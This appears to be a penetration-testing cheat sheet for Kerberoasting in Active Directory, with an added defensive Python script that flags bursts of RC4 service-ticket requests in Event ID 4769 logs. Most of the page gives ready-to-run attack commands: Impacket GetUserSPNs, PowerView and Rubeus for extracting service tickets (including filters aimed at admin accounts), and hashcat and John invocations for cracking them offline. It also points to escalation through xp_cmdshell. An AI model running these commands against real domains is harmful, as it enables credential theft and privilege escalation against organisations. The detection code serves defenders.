Kerberoasting
ABOUT
Kerberoasting is a lateral movement/privilege escalation technique in Active Directory environments. This attack targets Service Principal Name (SPN) accounts.
Domain accounts are often used to run services to overcome the network authentication limitations of built-in accounts such as NT AUTHORITY\LOCAL SERVICE.
Any domain user can request a Kerberos ticket for any service account in the same domain.
It works because, in the Kerberos protocol, holding a TGT is enough for the KDC to treat you as a legitimate domain member, so it will issue a service ticket (ST), which is encrypted with a key derived from the service account's password. If you then tried to access the service, the service itself would check UAC settings and ACLs and deny access; the weakness is that any authenticated user can request the TGS ticket in the first place, and that alone is enough to:
1. Look for juicy Kerberoastable accounts with SPNs to target.
2. Extract the TGS tickets.
3. Crack them offline to recover the credentials (the hash cannot be used for Pass-the-Hash, only cracked).
This is also possible across forest trusts if authentication is permitted across the trust boundary.
If the password for a domain SQL Server service account is cracked, you are likely to find yourself as a local admin on multiple servers, if not Domain Admin. Even if cracking a ticket obtained via a Kerberoasting attack gives a low-privilege user account, we can use it to craft service tickets for the service specified in the SPN. For example, if the SPN is set to MSSQL/SRV01, we can access the MSSQL service as sysadmin, enable the xp_cmdshell extended procedure and gain code execution on the target SQL server.
Prerequisites
Kerberoasting can be run from several setups (a shell or valid domain credentials are required in every case):
Non-domain Linux machine (Impacket, netexec, hashcat, john, etc.).
Non-domain Windows machine (using runas /netonly).
Domain-joined Windows machine (PowerView, Rubeus, Mimikatz, setspn.exe, etc.).
LINUX
GetUserSPNs
Use the -outputfile parameter to write the results to a file.
List SPN Accounts
impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reed
Request all TGS Tickets
impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reed -request
Target Specific User
impacket-GetUserSPNs -dc-ip 13.13.13.13 MILITECH.LOCAL/sol.reed -request-user songbird
With the -target-domain parameter we can do Cross-Forest Kerberoasting.
WINDOWS
PowerView
List SPN Accounts
PS C:\> Import-Module .\PowerView.ps1
PS C:\> Get-DomainUser * -spn | select samaccountname
Target Specific User
PS C:\> Get-DomainUser -Identity sqldev | Get-DomainSPNTicket -Format Hashcat
Extract all Tickets to CSV
PS C:\> Get-DomainUser * -SPN | Get-DomainSPNTicket -Format Hashcat | Export-Csv .\crack_tgs.csv -NoTypeInformation
Rubeus
Stats
PS C:\> .\Rubeus.exe kerberoast /stats
Target High-Value Accounts
PS C:\> .\Rubeus.exe kerberoast /ldapfilter:'admincount=1' /nowrap
Target Specific User
PS C:\> .\Rubeus.exe kerberoast /user:testuser /nowrap # For RC4 only, use /tgtdeleg
With Rubeus's /domain parameter (or PowerView's -Domain parameter) we can do Cross-Forest Kerberoasting.
CRACKING
Note: on Windows Server 2016 or earlier, request the hash in RC4 format because it is much easier to crack; on later versions you will be dealing with AES encryption.
If the hash begins with $krb5tgs$23$* it is an RC4 hash (23 is the Kerberos encryption type number for RC4-HMAC).
Checking Supported Encryption Types
PS C:\> Get-DomainUser testuser -Properties samaccountname,serviceprincipalname,msds-supportedencryptiontypes
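From the defender's side the same RC4-versus-AES distinction is visible in the domain controller's Event ID 4769 records, where TicketEncryptionType is 0x17 for RC4-HMAC and 0x12 for AES256. The following is an added example, not from the page's author: it flags any account that requested RC4 service tickets for several distinct SPNs within a short window, the pattern the Rubeus and GetUserSPNs commands above produce. The one-line log format, the account names and the thresholds are constructed for the example; the field names are the real 4769 ones.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of Event ID 4769 records, one per line, reduced to the
# fields this check needs. Real events are EVTX/XML; this flat layout is an
# assumption made for the example.
SAMPLE_4769 = """\
2024-05-01T09:00:01 TargetUserName=sol.reed@MILITECH.LOCAL ServiceName=sqldev TicketEncryptionType=0x17 Status=0x0
2024-05-01T09:00:02 TargetUserName=sol.reed@MILITECH.LOCAL ServiceName=songbird TicketEncryptionType=0x17 Status=0x0
2024-05-01T09:00:03 TargetUserName=sol.reed@MILITECH.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 Status=0x0
2024-05-01T09:00:04 TargetUserName=sol.reed@MILITECH.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 Status=0x0
2024-05-01T09:05:00 TargetUserName=j.doe@MILITECH.LOCAL ServiceName=sqldev TicketEncryptionType=0x12 Status=0x0
2024-05-01T09:06:00 TargetUserName=j.doe@MILITECH.LOCAL ServiceName=svc_web TicketEncryptionType=0x12 Status=0x0
2024-05-01T10:30:00 TargetUserName=SRV01$@MILITECH.LOCAL ServiceName=krbtgt TicketEncryptionType=0x12 Status=0x0
"""

RC4_HMAC = "0x17"  # etype 23, i.e. the $krb5tgs$23$ hashes the cracking section targets
LINE_RE = re.compile(r"^(\S+) TargetUserName=(\S+) ServiceName=(\S+) TicketEncryptionType=(\S+) Status=(\S+)$")

def parse_4769(text):
    """Yield (timestamp, requester, service, etype) for each successful 4769 record."""
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts, user, service, etype, status = m.groups()
        if status != "0x0":  # a failed request never yields a crackable ticket
            continue
        yield datetime.fromisoformat(ts), user, service.lower(), etype.lower()

def find_kerberoast_candidates(text, min_spns=3, window=timedelta(minutes=10)):
    """Return {requester: sorted SPN accounts} for requesters that obtained RC4 service
    tickets for at least min_spns distinct services inside one sliding window.
    krbtgt requests are TGT renewals, not service tickets, and are ignored."""
    by_user = defaultdict(list)
    for ts, user, service, etype in parse_4769(text):
        if etype == RC4_HMAC and service != "krbtgt":
            by_user[user].append((ts, service))
    hits = {}
    for user, events in by_user.items():
        events.sort()
        for i, (start, _) in enumerate(events):
            spns = {s for t, s in events[i:] if t - start <= window}
            if len(spns) >= min_spns:
                hits[user] = sorted(spns)
                break
    return hits
```

Accounts whose msds-supportedencryptiontypes already exclude RC4 should never appear as 0x17 in these records, so a hit against such an account is worth a closer look on its own.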
Hashcat
1. Convert kirbi to Crackable format
python2.7 kirbi2john.py sqldev.kirbi > crack_tgs_unprocessed
2. Modifying file for Hashcat
sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/' crack_tgs_unprocessed > crack_tgs
3. Run Hashcat
hashcat -m 13100 crack_tgs /usr/share/wordlists/rockyou.txt # 13100 mode is for RC4
John
1. Convert kirbi to Crackable format
python2.7 kirbi2john.py sqldev.kirbi > crack_tgs
2. Run John
john --wordlist=/usr/share/wordlists/rockyou.txt crack_tgs